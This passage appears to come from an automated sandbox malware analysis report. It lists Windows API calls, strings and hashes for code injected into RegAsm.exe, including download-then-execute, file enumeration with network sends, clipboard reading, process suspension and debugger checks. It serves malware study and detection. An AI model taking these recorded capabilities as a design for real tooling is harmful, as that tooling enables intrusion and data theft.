                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: ACP$OCP
                                                                • API String ID: 2299586839-711371036
                                                                • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                APIs
                                                                • FindResourceA.KERNEL32 ref: 0041B54A
                                                                • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Resource$FindLoadLockSizeof
                                                                • String ID: SETTINGS
                                                                • API String ID: 3473537107-594951305
                                                                • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 004096A5
                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                • String ID:
                                                                • API String ID: 1157919129-0
                                                                • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 0040884C
                                                                • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                • String ID:
                                                                • API String ID: 1771804793-0
                                                                • Opcode ID: b1eb176887f564738bcb701d3fa8af3362899acb6c57e34aba652b3bc19319a0
                                                                • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                • Opcode Fuzzy Hash: b1eb176887f564738bcb701d3fa8af3362899acb6c57e34aba652b3bc19319a0
                                                                • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DownloadExecuteFileShell
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                • API String ID: 2825088817-3056885514
                                                                • Opcode ID: fe84851e8d7f70732d898fdaef0aba1a4162abd4a1fe116b66043c687c2ffd0e
                                                                • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                • Opcode Fuzzy Hash: fe84851e8d7f70732d898fdaef0aba1a4162abd4a1fe116b66043c687c2ffd0e
                                                                • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileFind$FirstNextsend
                                                                • String ID: XPG$XPG
                                                                • API String ID: 4113138495-1962359302
                                                                • Opcode ID: edb16b4144dcf9e536f362a26b882d6c4348f4f9c8c054f169ec42c10df1cf14
                                                                • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                • Opcode Fuzzy Hash: edb16b4144dcf9e536f362a26b882d6c4348f4f9c8c054f169ec42c10df1cf14
                                                                • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                • String ID: p'E$JD
                                                                • API String ID: 1084509184-908320845
                                                                • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                • String ID:
                                                                • API String ID: 2829624132-0
                                                                • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                • String ID:
                                                                • API String ID: 3906539128-0
                                                                • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                • String ID:
                                                                • API String ID: 3906539128-0
                                                                • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                • ExitProcess.KERNEL32 ref: 10004AEE
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Process$CurrentExitTerminate
                                                                • String ID:
                                                                • API String ID: 1703294689-0
                                                                • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                • ExitProcess.KERNEL32 ref: 0044338F
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CurrentExitTerminate
                                                                • String ID:
                                                                • API String ID: 1703294689-0
                                                                • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$CloseDataOpen
                                                                • String ID:
                                                                • API String ID: 2058664381-0
                                                                • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                APIs
                                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseHandleOpenResume
                                                                • String ID:
                                                                • API String ID: 3614150671-0
                                                                • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                                                • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                                APIs
                                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                                • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseHandleOpenSuspend
                                                                • String ID:
                                                                • API String ID: 1999457699-0
                                                                • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                                • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FeaturePresentProcessor
                                                                • String ID: MZ@
                                                                • API String ID: 2325560087-2978689999
                                                                • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .
                                                                • API String ID: 0-248832578
                                                                • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .
                                                                • API String ID: 0-248832578
                                                                • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                                • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                • String ID: JD
                                                                • API String ID: 1084509184-2669065882
                                                                • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: GetLocaleInfoEx
                                                                • API String ID: 2299586839-2904428671
                                                                • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                                • String ID:
                                                                • API String ID: 1661935332-0
